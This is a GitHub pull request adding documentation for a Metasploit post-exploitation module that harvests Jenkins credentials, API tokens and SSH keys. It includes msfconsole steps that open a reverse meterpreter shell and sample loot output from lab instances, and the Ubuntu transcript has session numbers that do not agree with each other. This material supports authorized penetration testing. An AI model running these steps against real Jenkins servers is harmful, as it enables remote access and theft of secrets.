Add post module multi/gather/jenkins #8627

Merged
merged 7 commits into from Aug 9, 2017
206 changes: 206 additions & 0 deletions documentation/modules/post/multi/gather/jenkins_gather.md
@@ -0,0 +1,206 @@
## Vulnerable Application

Official Source:
[Jenkins](https://jenkins.io/download/)

This module has been verified against:

1. Jenkins 2.67 on Ubuntu 16.04 in Docker
1. Jenkins 2.67 on Windows 7 SP 1
1. Jenkins 2.60.1
1. Jenkins 1.56

## Verification Steps

1. Set up Jenkins to obtain a shell (use Docker for quick setup)
1. Run `docker run -p 8080:8080 -p 50000:50000 jenkins`
1. Use the default setup and install "suggested plugins"
1. Create new user admin, add a user or credential (via Manage Jenkins)
1. Start msfconsole
1. We'll use the `jenkins_script_console` module to quickly gain a shell
1. Do: ```use exploit/multi/http/jenkins_script_console```
1. Do: ```set RHOST 172.17.0.1```
1. Do: ```set RPORT 8080```
1. Do: ```set TARGETURI /```
1. Do: ```set USERNAME admin```
1. Do: ```set PASSWORD or set API_TOKEN```
1. Do: ```set TARGET 1```
1. Do: ```set PAYLOAD linux/x86/meterpreter/reverse_tcp```
1. Do: ```set LHOST 192.168.56.105```
1. Do: ```exploit -j```
1. Do: ```use post/multi/gather/jenkins_gather```
1. Do: ```set SESSION 1```
1. Do: ```run```
1. You should see the saved credentials output

## Options

**SEARCH_JOBS**

This option searches through the `jobs` folder for interesting
keywords but obviously increases runtime on larger instances.

**STORE_LOOT**

This option saves interesting files and loot to disk. If set to
false will simply output data to console.

## Scenarios

**Jenkins on Windows**

```
msf post(jenkins_gather) > sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
18 shell x86/linux 192.168.56.105:4444 -> 192.168.56.1:58828 (172.17.0.1)
20 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 192.168.56.105:4444 -> 192.168.56.1:58974 (172.17.0.2)
21 meterpreter x86/windows NT AUTHORITY\SYSTEM @ kali 192.168.56.105:4444 -> 192.168.56.101:50427 (192.168.56.101)
23 shell x86/windows 192.168.56.105:4444 -> 192.168.56.101:50793 (192.168.56.101)

msf post(jenkins_gather) > info

Name: Jenkins Credential Collector
Module: post/multi/gather/jenkins_gather
Platform: Linux, Windows
Arch:
Rank: Normal

Provided by:
thesubtlety

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SEARCH_JOBS true no Search through job history logs for interesting keywords. Increases runtime.
SESSION 17 yes The session to run this module on.
STORE_LOOT true no Store files in loot (will simply output file to console if set to false).

Description:
This module can be used to extract saved Jenkins credentials, user
tokens, SSH keys, and secrets. Interesting files will be stored in
loot along with combined csv output.


msf post(jenkins_gather) > run

[*] Searching for Jenkins directory... This could take some time...
[*] Found Jenkins installation at C:\Program Files\Jenkins
[+] Credentials found - Username: user1 Password: Password123456
[+] SSH Key found! ID: 83c6a18f-6b35-420a-8534-cc505c3347b5 Passphrase: secretpassphrase123 Username: sshkey1 Description: interesting description
[+] Job Info found - Job Name: User: testpass Password: secretpass123
[+] Job Info found - Job Name: User: testpass Password: ohwowosupersecret
[+] Node Info found - Name: test Host: hostnode1.lab.local Port: 22 CredID: 972fc428-dd7c-46ea-a119-be78ae0866ad
[+] API Token found - Username: admin Token: 8a114e0fa48c1a489c39b98e94c986c8
[+] API Token found - Username: useruseruser Token: 6810c3f6ccca939ac2a8b8ac4b9de012
[*] Searching through job history for interesting bits...
[+] Job Log truffles:
C:\Program Files\Jenkins\jobs\asdf\builds\4\log:C:\Program Files\Jenkins\workspace\asdf>echo "secret is secret"
C:\Program Files\Jenkins\jobs\asdf\builds\4\log:"secret is secret"
...
C:\Program Files\Jenkins\jobs\asdf\lastSuccessful\log:C:\Program Files\Jenkins\workspace\asdf>echo "secret is secret"
C:\Program Files\Jenkins\jobs\asdf\lastSuccessful\log:"secret is secret"
[+]
Creds
=====

Username Password Description
-------- -------- -----------

testpass secretpass123
testpass ohwowosupersecret
user1 Password123456

[+]
API Keys
========

Username API Tokens
-------- ----------
admin 8a114e0fa48c1a489c39b98e94c986c8
useruseruser 6810c3f6ccca939ac2a8b8ac4b9de012

[+]
Nodes
=====

Node Name Hostname Port Description Cred Id
--------- -------- ---- ----------- -------
test hostnode1.lab.local 22 testtesttest 972fc428-dd7c-46ea-a119-be78ae0866ad

[+] SSH Key
[*] ID: 83c6a18f-6b35-420a-8534-cc505c3347b5
[*] Description: interesting description
[*] Passphrase: secretpassphrase123
[*] Username: sshkey1
[*]
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAuTfL0ijR0JDLTQC092ZolnkTJGRi7YQInK/K1ZFDFc44JOSU
...snip...
7Ad+Ja6+51ECnXJIFKPj7binB6/C10YVqHh4KON3DeA6ZA7ZpUko
-----END RSA PRIVATE KEY-----

[*] Post module execution completed


```

**Jenkins 2.67 on Ubuntu 16.04**

```
msf post(jenkins_gather) > set session 20
session => 18
msf post(jenkins_gather) > info

Name: Jenkins Credential Collector
Module: post/multi/gather/jenkins_gather
Platform: Linux, Windows
Arch:
Rank: Normal

Provided by:
thesubtlety

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SEARCH_JOBS true no Search through job history logs for interesting keywords. Increases runtime.
SESSION 17 yes The session to run this module on.
STORE_LOOT true no Store files in loot (will simply output file to console if set to false).

Description:
This module can be used to extract saved Jenkins credentials, user
tokens, SSH keys, and secrets. Interesting files will be stored in
loot along with combined csv output.

msf post(jenkins_gather) > run

[*] Searching for Jenkins directory... This could take some time...
[*] Found Jenkins installation at /root/.jenkins
[+] Credentials found - Username: thanksforthefish Password: whatagreatbook
[+] API Token found - Username: user1 Token: 859e1d6ee6ab85804434fa5395ab962d
[+] API Token found - Username: admin Token: 9da706c125a4b5a4c19b1f799723175c
[*] Searching through job history for interesting bits...
[+]
Creds
=====

Username Password Description
-------- -------- -----------
thanksforthefish whatagreatbook

[+]
API Keys
========

Username API Tokens
-------- ----------
admin 9da706c125a4b5a4c19b1f799723175c
user1 859e1d6ee6ab85804434fa5395ab962d

[*] Post module execution completed
```
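Review bot: the Ubuntu scenario transcript is internally inconsistent, which makes the example hard to follow: `set session 20` is answered with `session => 18`, and both `info` listings still show `SESSION 17`, so the output was evidently stitched together from several runs; please re-capture the scenario from one session so the SESSION value, the echo and the run all agree. In the Windows scenario the lines `[+] Job Info found - Job Name: User: testpass Password: secretpass123` print an empty Job Name, which is either a module formatting bug (the job name not being filled in) or an unnamed sample job; worth confirming before merge, because the job name is what lets a defender or operator trace a recovered credential back to the pipeline that leaked it. Two smaller points in the same file: the Verification Steps wrap each command in triple backticks inside a list item, where single backticks are what renders as inline code in Markdown, and the step "set PASSWORD or set API_TOKEN" reads better as two explicit alternatives (`set PASSWORD <password>` or `set API_TOKEN <token>`). Finally, the STORE_LOOT description "If set to false will simply output data to console." is missing its subject; suggest "If set to false, the module will simply output the data to the console."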